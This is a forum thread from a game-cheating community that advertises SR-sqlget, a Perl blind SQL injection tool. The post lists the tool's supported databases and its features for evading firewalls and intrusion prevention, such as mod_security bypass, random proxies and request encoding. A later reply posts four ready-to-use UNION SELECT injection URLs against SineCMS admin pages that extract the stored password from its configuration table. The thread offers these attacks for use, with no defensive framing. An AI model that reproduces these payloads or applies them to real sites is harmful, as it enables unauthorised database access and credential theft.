Jump to content
MaxCheaters Official Group on Discord
Top.MaxCheaters.com is now OPEN – Lineage 2 Top Listing

[Tool] Blind SQL Injection

lostos

By lostos
in Other Multiplayer Games

 Share

Recommended Posts

lostos Newbie

lostos

Posted
Posted

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.

 

 

Information provided by Infobyte

 

 

SR-sqlget: It's a blind SQL injection tool developed in Perl. It lets you get databases schemas and tables rows. Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

 

Databases supported:

- IBM DB2

- Microsoft SQL Server

- Oracle

- Postgres

- Mysql

- IBM Informix

- Sybase

- Hsqldb (www.hsqldb.org)

- Mimer (www.mimer.com)

- Pervasive (www.pervasive.com)

- Virtuoso (virtuoso.openlinksw.com)

- SQLite

- Interbase/Yaffil/Firebird (Borland)

- H2 (http://www.h2database.com)

- Mckoi (http://mckoi.com/database/)

- Ingres (http://www.ingres.com)

- MonetDB (http://www.monetdb.nl)

- MaxDB (www.mysql.com/products/maxdb/)

- ThinkSQL (http://www.thinksql.co.uk/)

- SQLBase (http://www.unify.com)

 

Evasion features:

- Full-width/Half-width Unicode encoding

- Apache non standard CR bypass

- mod_security bypass

- Random uppercase request transform

- PHP Magicquotes: encode every string using db CHR function or similar.

- Convert requests to hexadecimal values

- Avoid non-space replacing for /**/ or (\t) tab

- Avoid non || or + concatenation using db concat function or similar.

- Random user-agent

- Random proxy-server

- Random delay request

 

Common features:

- Database schemate download blacklist

- Cookie array support

- SSL support

- Proxy server support

- Database information dumped in csv format

 

Reporting:

- Database structure graphication to create impact executive reports require Graphviz library (http://www.graphviz.org/)

 

Demo:

- Demo features (bypassing IBM ISS Proventia IPS) - http://www.infobyte.com.ar/demo/ISR_sqlget_ISS_proventia_bypass.html

 

 

  • 3 weeks later...
  • 3 weeks later...
  • 3 months later...
SoulShade Newbie

SoulShade

Posted
Posted

Hmm sorry for posting in quite old post...But i think its the apropriate place to ask this:

I dont know nothing about mysql injections, so, i want to know how its done...How can i Insert or Read data from a database with an injection...Info plix, thnx:D

  • 3 weeks later...
anath3ma Newbie

anath3ma

Posted
Posted

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,

6+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9

+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Databay
      █ 7,000,000+ RESIDENTIAL PROXIES ✅ FROM 0.65$ / GB █

      By Databay · Posted

      This is a bump: https://databay.com/
    • Banshee Garnet
      L2OFF Services

      By Banshee Garnet · Posted

      New implementations   Autofarm complete system with time limit fully configurable   Tournament 1vs1 ( not instanced ) With queue fully configurable ( possibility to run all day or 2 different hours for example Latin/Europe   Fortress vs Fortress event automated with top killer reward , protections and fully configurable with seperated .ini   And more
    • babyjason
      Volcanic Monsters (notifications )

      By babyjason · Posted

      Anybody has these monsters ripped from the latest chronicle lineagemonsters14.volcanic_archer_m00 lineagemonsters14.volcanic_ice_m00 lineagemonsters14.volcanic_magic_m00 lineagemonsters14.volcanic_warrior_m00 lineagemonsters14.volcanic_boss_m00  
    • babyjason
      Editing Ability Points names and description, How?

      By babyjason · Posted

      thanks guys
    • eMommy
      Editing Ability Points names and description, How?

      By eMommy · Posted

      this is literally like such bad advice? i dont thikn you understand the question..   node_begin name=[Ability] type=5 sub_node_begin paramType=100 unk=0 nodeName=[Type] int_params={1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;2;2;2;2;2;2;2;2;2;2;2;2;2;2;2;2;2;2;2;3;3;3;3;3;3;3;3;3;3;3;3;3;3;3;3;3} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[SkillID] int_params={19233;19234;19235;19236;19237;19238;19239;19240;19241;19242;19243;19244;19245;19246;19247;19248;19249;19250;19251;19252;19253;19254;19255;19256;19257;19258;19259;19260;19261;19262;19263;19264;19265;19266;19267;19268;19269;19270;19271;19272;19273;19274;19275;19276;19277;19278;19279;19280;19281;19282;19283;19284;19285;19286;19287;19288;19289} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[SkillLev] int_params={3;3;3;3;2;2;2;2;4;1;4;1;2;2;2;2;2;1;1;2;1;2;4;4;3;2;3;1;3;2;3;1;2;2;1;2;2;2;2;1;2;3;3;3;3;1;3;2;1;2;2;2;2;2;2;2;1} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[Depth] int_params={1;1;1;1;2;2;2;2;3;3;3;3;4;4;4;4;5;5;5;5;6;1;1;1;2;2;2;2;3;3;3;3;4;4;4;4;5;5;5;6;1;1;1;2;2;2;3;3;3;4;4;4;4;5;5;5;6} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[Column] int_params={1;2;3;4;1;2;3;4;1;2;3;4;1;2;3;4;1;2;3;4;2;1;2;4;1;2;3;4;1;2;3;4;1;2;3;4;1;2;4;2;1;2;4;1;3;4;1;2;4;1;2;3;4;1;2;4;2} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[RequireLev] int_params={85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85;85} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[RequireSkillID] int_params={0;0;0;0;0;0;0;19236;19237;0;19239;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;19257;0;19259;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;19276;0;0;0;0;0;0;0;0;0;0} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[RequireSkillLev] int_params={0;0;0;0;0;0;0;3;2;0;2;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;3;0;3;0;0;0;0;0;0;0;0;0;0;0;0;0;0;0;3;0;0;0;0;0;0;0;0;0;0} sub_node_end sub_node_begin paramType=100 unk=0 nodeName=[RequireCount] int_params={0;0;0;0;5;5;5;5;10;10;10;10;15;15;15;15;20;20;20;20;25;0;0;0;5;5;5;5;10;10;10;10;15;15;15;15;20;20;20;25;0;0;0;5;5;5;10;10;10;15;15;15;15;20;20;20;25} sub_node_end sub_node_begin paramType=115 unk=0 nodeName=[Name] string_params={[Guardian's Shield];[Guardian's Magic Barrier];[Guardian's Body];[Guardian's Elemental Cover];[Guardian's Armor Defense];[Guardian's Leather Defense];[Guardian's Tunic Defense];[Guardian's Resistance];[Guardian's Life];[Guardian's Block];[Guardian's Armor];[Guardian's Guidance];[Guardian's Death Shield];[Guardian's Focus Shield];[Guardian's Mind Control];[Guardian's Blessing];[Guardian's Binding Cover];[Guardian's Spirit];[Guardian's Potential];[Guardian's Expert Potion];[Guardian's Defense Master];[Berserker's Haste];[Berserker's Might];[Berserker's Elemental Attack];[Berserker's Craft Focus];[Berserker's Backfire];[Berserker's Focus];[Berserker's Cost];[Berserker's Craft Death];[Berserker's Mortal];[Berserker's Death Whisper];[Berserker's Eagle];[Berserker's Battle];[Berserker's Fire];[Berserker's Skill Reduction];[Berserker's Blessing];[Berserker's Binding Attack];[Berserker's Divine Attack];[Berserker's Expert Potion];[Berserker's Combat Master];[Magician's Acumen];[Magician's Empower];[Magician's Elemental Shot];[Magician's Wild Magic];[Magician's Condition];[Magician's Eva];[Magician's Mystic];[Magician's Prominence];[Magician's Sight];[Magician's Protection];[Magician's Water];[Magician's Magic Reduction];[Magician's Blessing];[Magician's Binding Shot];[Magician's Divine Shot];[Magician's Expert Potion];[Magician's Spell Master]} sub_node_end sub_node_begin paramType=115 unk=0 nodeName=[Icon] string_params={[icon.skill19120];[icon.skill19121];[icon.skill1045];[icon.skill1352];[icon.skill0231];[icon.skill0233];[icon.skill0234];[icon.skill1354];[icon.skill1229];[icon.skill1304];[icon.skill19165];[icon.skill19127];[icon.skill1542];[icon.skill0986];[icon.skill19132];[icon.skill_exp_sp_up];[icon.skill0335];[icon.skill10044];[icon.skill1532];[icon.skill_potion_up];[icon.skill0528];[icon.skill1086];[icon.skill19139];[icon.skill19130];[icon.skill0193];[icon.skill0030];[icon.skill1077];[icon.skill19140];[icon.skill10655];[icon.skill0330];[icon.skill4278];[icon.skill19127];[icon.skill1388];[icon.skill1356];[icon.skill0758];[icon.skill_exp_sp_up];[icon.skill0983];[icon.skill11011];[icon.skill_potion_up];[icon.skill1499];[icon.skill1085];[icon.skill1059];[icon.skill19130];[icon.skill1303];[icon.skill1501];[icon.skill0214];[icon.skill19160];[icon.skill0330];[icon.skill19127];[icon.skill0046];[icon.skill1355];[icon.skill0945];[icon.skill_exp_sp_up];[icon.skill0983];[icon.skill11011];[icon.skill_potion_up];[icon.skill1500]} sub_node_end sub_node_begin paramType=115 unk=0 nodeName=[IconPanel] string_params={[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_blessed];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.pannel_pupple];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2];[icon.panel_2]} sub_node_end sub_node_begin paramType=109 unk=0 nodeName=[LevelDesc] array_params={{[P. Def. + 2%];[P. Def. + 4%];[P. Def. + 7%]};{[M. Def. + 2%];[M. Def. + 4%];[M. Def. + 7%]};{[Max HP + 3%];[Max HP + 6%];[Max HP + 9%]};{[All Attribute Defense + 15];[All Attribute Defense + 25];[All Attribute Defense + 40]};{[When equipping Heavy Armor <br>P./M. Def. + 3%];[When equipping Heavy Armor <br>P./M. Def. + 6%]};{[When equipping Light Armor <br>P./M. Def. + 3%];[When equipping Light Armor <br>P./M. Def. + 6%]};{[When equipping Robe <br>P./M. Def. + 3%];[When equipping Robe <br>P./M. Def. + 6%]};{[Debuff Resistance + 5%];[Debuff Resistance + 10%]};{[Max HP + 3%];[Max HP + 6%];[Max HP + 10%];[Max HP + 15%]};{[Shield Defense + 100%]};{[P. Def. + 2%];[P. Def. + 4%];[P. Def. + 8%];[P. Def. + 12%]};{[P. Accuracy, M. Accuracy,<br>servitor's P. Accuracy + 12.<br>Enchants Revelation skill]};{[Received P. Critical Damage - 10%];[Received P. Critical Damage - 20%]};{[Chance of receiving P. Critical Damage - 15%];[Chance of receiving P. Critical Damage - 30%]};{[Skill Cooldown - 3%];[Skill Cooldown - 5%]};{[EXP, SP + 5%];[EXP, SP + 10%]};{[Received damage when immobilized - 7%];[Received damage when immobilized - 15%]};{[All Attribute Defense + 50]};{[Skill Critical Rate + 10%]};{[Recovery Potion, Elixir Effect + 500];[Recovery Potion, Elixir Effect + 1000]};{[Received Damage - 10%]};{[Atk. Spd. + 1%];[Atk. Spd. + 3%]};{[P. Atk. + 1%];[P. Atk. + 2%];[P. Atk. + 3%];[P. Atk. + 4%]};{[Attack Attribute + 10];[Attack Attribute + 20];[Attack Attribute + 30];[Attack Attribute + 40]};{[P. Skill Critical Rate + 3%];[P. Skill Critical Rate + 6%];[P. Skill Critical Rate + 10%]};{[Rear Damage + 2%];[Rear Damage + 5%]};{[P. Critical Rate + 10];[P. Critical Rate + 20];[P. Critical Rate + 40]};{[Skill MP Consumption - 5%]};{[P. Skill Critical Damage + 2%];[P. Skill Critical Damage + 4%];[P. Skill Critical Damage + 7%]};{[Skill Mastery Rate + 30%];[Skill Mastery Rate + 60%]};{[P. Critical Damage + 2%];[P. Critical Damage + 4%];[P. Critical Damage + 7%]};{[P. Accuracy, M. Accuracy,<br>servitor's P. Accuracy + 12.<br>Enchants Revelation skill]};{[P. Atk. + 3%];[P. Atk. + 6%]};{[P. Skill Power + 2%];[P. Skill Power + 5%]};{[Skill Cooldown - 3%]};{[EXP, SP + 5%];[EXP, SP + 10%]};{[Damage to immobilized<br>targets + 5%];[Damage to immobilized<br>targets + 10%]};{[Attack Attribute + 25];[Attack Attribute + 50]};{[Recovery Potion, Elixir Effect + 500];[Recovery Potion, Elixir Effect + 1000]};{[Damage + 10%]};{[Casting Spd. + 2%];[Casting Spd. + 4%]};{[M. Atk. + 2%];[M. Atk. + 5%];[M. Atk. + 8%]};{[Attack Attribute + 10];[Attack Attribute + 20];[Attack Attribute + 40]};{[M. Critical Rate + 10];[M. Critical Rate + 20];[M. Critical Rate + 40]};{[Max HP, MP + 3%];[Max HP, MP + 6%];[Max HP, MP + 9%]};{[Skill MP Consumption - 5%]};{[M. Critical Damage + 3%];[M. Critical Damage + 6%];[M. Critical Damage + 10%]};{[Skill Mastery Rate + 30%];[Skill Mastery Rate + 60%]};{[P. Accuracy, M. Accuracy,<br>servitor's P. Accuracy + 12.<br>Enchants Revelation skill]};{[Mental, Stun, Aerial Yoke<br>Success Rate + 5%];[Mental, Stun, Aerial Yoke<br>Success Rate + 10%]};{[M. Skill Power + 2%];[M. Skill Power + 5%]};{[Skill Cooldown - 3%];[Skill Cooldown - 5%]};{[EXP, SP + 5%];[EXP, SP + 10%]};{[Damage to Immobile<br>Opponents + 5%];[Damage to Immobile<br>Opponents + 10%]};{[Attack Attribute + 25];[Attack Attribute + 50]};{[Recovery Potion, Elixir Effect + 500];[Recovery Potion, Elixir Effect + 1000]};{[Damage + 10%]}} sub_node_end node_end @babyjason in regards to your post ><

  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..